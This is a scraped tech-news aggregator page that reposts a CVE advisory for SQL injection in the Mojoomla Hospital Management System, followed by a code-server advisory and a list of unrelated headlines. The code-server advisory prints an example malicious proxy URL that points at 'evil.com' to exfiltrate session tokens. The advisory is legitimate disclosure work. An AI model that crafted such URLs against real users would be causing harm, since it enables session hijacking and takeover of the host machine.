CVE-2025-39357 – Mojoomla Hospital Management System SQL Injection

May 19, 2025

CVE ID : CVE-2025-39357

Published : May 19, 2025, 8:15 p.m. | 3 hours, 59 minutes ago

Description : Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in mojoomla Hospital Management System allows SQL Injection.This issue affects Hospital Management System: from n/a through 47.0(20-11-2023).

Severity: 8.5 | HIGH

Visit the link for more details, such as CVSS details, affected products, timeline, and more…

Source: Read More

Previous ArticleCVE-2025-39365 – Rocket Apps wProject Cross-site Scripting

Next Article CVE-2025-39350 – Rocket Apps wProject Missing Authorization Vulnerability

Highlights

CVE-2025-47269 – Code-server Proxy Pathway Token Exfiltration

May 9, 2025

CVE ID : CVE-2025-47269

Published : May 9, 2025, 9:15 p.m. | 2 hours, 37 minutes ago

Description : code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https:///proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user’s session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker’s domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.

Severity: 8.3 | HIGH

Visit the link for more details, such as CVSS details, affected products, timeline, and more…

10 Top Node.js Development Companies for Enterprise-Scale Projects (2025-2026 Ranked & Reviewed)

12 Must-Know Cost Factors When Hiring Node.js Developers for Your Enterprise

Mirantis reveals Lens Prism, an AI copilot for operating Kubernetes clusters

Avoid these common platform engineering mistakes

Hideo Kojima’s “OD” is still in development with Xbox, at least for today

Microsoft is replacing salespeople with “solutions engineers” amid recent layoffs — promoting Copilot AI while ChatGPT dominates the enterprise sector

Microsoft’s extra year of Windows 10 security updates isn’t a “viable solution” for the 400 million PCs that can’t upgrade to Windows 11 — “It’s obvious users are frustrated and feel yanked around.”

OpenAI almost shipped ChatGPT with a different name — before a late-night twist

The dog days of JavaScript summer

The dog days of JavaScript summer

Databricks Lakebase – Database Branching in Action

Flutter + GitHub Copilot = Your New Superpower

Hideo Kojima’s “OD” is still in development with Xbox, at least for today

Hideo Kojima’s “OD” is still in development with Xbox, at least for today

Microsoft is replacing salespeople with “solutions engineers” amid recent layoffs — promoting Copilot AI while ChatGPT dominates the enterprise sector

Microsoft’s extra year of Windows 10 security updates isn’t a “viable solution” for the 400 million PCs that can’t upgrade to Windows 11 — “It’s obvious users are frustrated and feel yanked around.”

CVE-2025-39357 – Mojoomla Hospital Management System SQL Injection

Citrix Releases Emergency Patches for Actively Exploited CVE-2025-6543 in NetScaler ADC

CISA Adds 3 Flaws to KEV Catalog, Impacting AMI MegaRAC, D-Link, Fortinet

mediasoup offers WebRTC video conferencing

CVE-2025-29526 – Q4 Inc Investor Relations Platform XSS

The best MacBooks of 2025: Expert tested and reviewed

My favorite File Explorer replacement just got better

CVE-2025-47269 – Code-server Proxy Pathway Token Exfiltration

A Customer-Centric Shoptalk Spring 2025

The rise of AI PCs: How businesses are reshaping their tech to keep up

Elden Ring Nightreign hits over 300k players on Steam within an hour of launch — despite middling reviews

CVE-2025-39357 – Mojoomla Hospital Management System SQL Injection

Related Posts